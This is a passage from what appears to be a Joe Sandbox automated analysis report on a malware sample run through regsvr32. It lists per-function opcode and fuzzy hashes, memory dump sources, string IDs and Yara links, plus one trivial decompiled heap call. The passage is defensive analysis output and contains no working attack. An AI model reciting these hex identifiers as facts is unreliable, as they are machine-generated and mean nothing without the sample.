                                                                                            • Instruction ID: 86e4d617eaf7a5da61f6f882766fb89a7c690a421d3d6cc135f1ca018dea51c6
                                                                                            • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                            • Instruction Fuzzy Hash: 9951D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00758500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8=
                                                                                            • API String ID: 0-237953557
                                                                                            • Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                            • Instruction ID: df96b3791e2c5c389720ad290d34c10c612a3b54f6fb3ca5a7f95a3900e45aaa
                                                                                            • Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
                                                                                            • Instruction Fuzzy Hash: 75314930248B458BDB5CDF2CC49922ABAE1FBD9301F444A2EF58AD7365DB74D845CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007420E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K
                                                                                            • API String ID: 0-425913083
                                                                                            • Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                            • Instruction ID: 829fe707bd336df108158ff160501675fe01d40d14c3d92f3f38ec33e969cbe9
                                                                                            • Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
                                                                                            • Instruction Fuzzy Hash: 6441F7B180438ECFDB48CF68D8864DE7BB0FB58344F114A19F866A6250D3B8D665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007408CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: t"
                                                                                            • API String ID: 0-2131657386
                                                                                            • Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                            • Instruction ID: 995776e1f740c07cec4ae203234901a859b454b9e09a11e8fcbc90f6f40fe952
                                                                                            • Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
                                                                                            • Instruction Fuzzy Hash: 6B41D67190070DCBDF48DF64C48A0DE7FB0FB083A8F656219E81AB6290D3B89585CF99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00743CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: gLv
                                                                                            • API String ID: 0-1669999040
                                                                                            • Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                            • Instruction ID: 00f843698d6bd15b24166d174794834e7a95513382a20fd88a7fee1bdca185a0
                                                                                            • Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
                                                                                            • Instruction Fuzzy Hash: 5A41A0B190078ECFDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007318DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2|
                                                                                            • API String ID: 0-4112153497
                                                                                            • Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                            • Instruction ID: 28e49b2606238fbad7e8748192c41e0a55e736015bfa8fd81993e6cbaebfc1c2
                                                                                            • Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
                                                                                            • Instruction Fuzzy Hash: 7831C3715183808FD768DF28C58A55BBBF1FBD6704F90891DE6CA8A260DB76D849CB03
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00754E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: v)v
                                                                                            • API String ID: 0-2248367734
                                                                                            • Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                            • Instruction ID: fcf3a8e6d3be087b68122641f46d63e652aac096ad5b75ff9bb58d85bd784286
                                                                                            • Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
                                                                                            • Instruction Fuzzy Hash: ED31FFB0D107189BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7785A45CF68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: b
                                                                                            • API String ID: 0-1908338681
                                                                                            • Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                            • Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
                                                                                            • Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
                                                                                            • Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073D33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Y
                                                                                            • API String ID: 0-579211002
                                                                                            • Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                            • Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
                                                                                            • Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
                                                                                            • Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00740E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0}
                                                                                            • API String ID: 0-2955618701
                                                                                            • Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                            • Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
                                                                                            • Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
                                                                                            • Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007398AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6N
                                                                                            • API String ID: 0-1503784733
                                                                                            • Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                            • Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
                                                                                            • Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
                                                                                            • Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007497CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: S}
                                                                                            • API String ID: 0-4277866985
                                                                                            • Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                            • Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
                                                                                            • Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
                                                                                            • Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074BDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H-
                                                                                            • API String ID: 0-1037293833
                                                                                            • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                            • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                            • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                            • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007496D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: u*AR
                                                                                            • API String ID: 0-611844632
                                                                                            • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                            • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                            • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                            • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073DBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: g*`
                                                                                            • API String ID: 0-1142845859
                                                                                            • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                            • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                            • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                            • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007392F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5$
                                                                                            • API String ID: 0-3756733592
                                                                                            • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                            • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                            • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                            • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: n*=
                                                                                            • API String ID: 0-1578461029
                                                                                            • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                            • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                            • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                            • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                            0x18000a87c
                                                                                            0x18000a885
                                                                                            0x18000a893

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                            • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                            • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                            • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073B258 Relevance: .3, Instructions: 310COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                            • Instruction ID: 4672e6b0faf56747d45931516aa967294410a7dd16cb614359a76f8256564692
                                                                                            • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                            • Instruction Fuzzy Hash: E5E1F570E0460ACFDF58DFA8D49A9AFBBB2FB44348F004159D806E72A1D7789A15CBC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00731000 Relevance: .2, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                            • Instruction ID: fe6ea005f5639c675d9390aaae5e4b5dba9abc438d73e7c7ac0d2e524ff0cb5a
                                                                                            • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                            • Instruction Fuzzy Hash: AAC1CEB9903609CFDB68CF38C49A59D3BF1AF64308F604119EC269A2A6D774D529CB48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074020C Relevance: .2, Instructions: 230COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                            • Instruction ID: 825b0e9917fd9aad1362f1dfaf5c504e65d1f67d6fe17b1a950adc5dd4fd1115
                                                                                            • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                            • Instruction Fuzzy Hash: ACB11771E04B489FDFA8DFA8D48A9DEBBF2FB44344F00451DE846A7290D7B8541ACB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073BA2C Relevance: .2, Instructions: 192COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                            • Instruction ID: a51721600db0622d8f0cbc348c4c120a5347a080f0533e7dd34b82db6b9d10ba
                                                                                            • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                            • Instruction Fuzzy Hash: 7FB1F6716087C88FDBBECF24C8892DB7BA9FB45708F504219E9CA8E254DB749744CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074D770 Relevance: .2, Instructions: 191COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                            • Instruction ID: ee86ddf0d35a64364977b4e1ba27a9762a45e0bf81772b671d5e309e57e315d5
                                                                                            • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                            • Instruction Fuzzy Hash: 53814B70D08709EFDB58DFA8C49599EBBF1FB44344F40856EE849EB290DB749A09CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007527EC Relevance: .2, Instructions: 184COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                            • Instruction ID: 83684f45fe9e977b774b6b642a06d97a4ff405ab719fd1c74209ec8d567ee4f0
                                                                                            • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                            • Instruction Fuzzy Hash: 4081077151074D9BDF88CF28C8C99DD7BB0FB583A8FA56218FC0AA6254D778D885CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00733ABC Relevance: .2, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                            • Instruction ID: 02b20daf93178a026e7f3d7b8144c0123b8c78d7e9ccfd4c8cf6a25771221141
                                                                                            • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                            • Instruction Fuzzy Hash: 4161217161464C8BEF28DF78D49A2AD3BE1FB44304F20613DEC669B2A2D778D906CB44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074E310 Relevance: .1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                            • Instruction ID: d737fb992c4fb93ed735a2887ebe2c03482fa0fa15aff5e16beb0bf84d6cbed1
                                                                                            • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                            • Instruction Fuzzy Hash: 9671F870508789CBDBF9CF28D8896DE7BE4FB88704F20461DE9998B2A0DB749645CF41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180007110 Relevance: .1, Instructions: 131COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
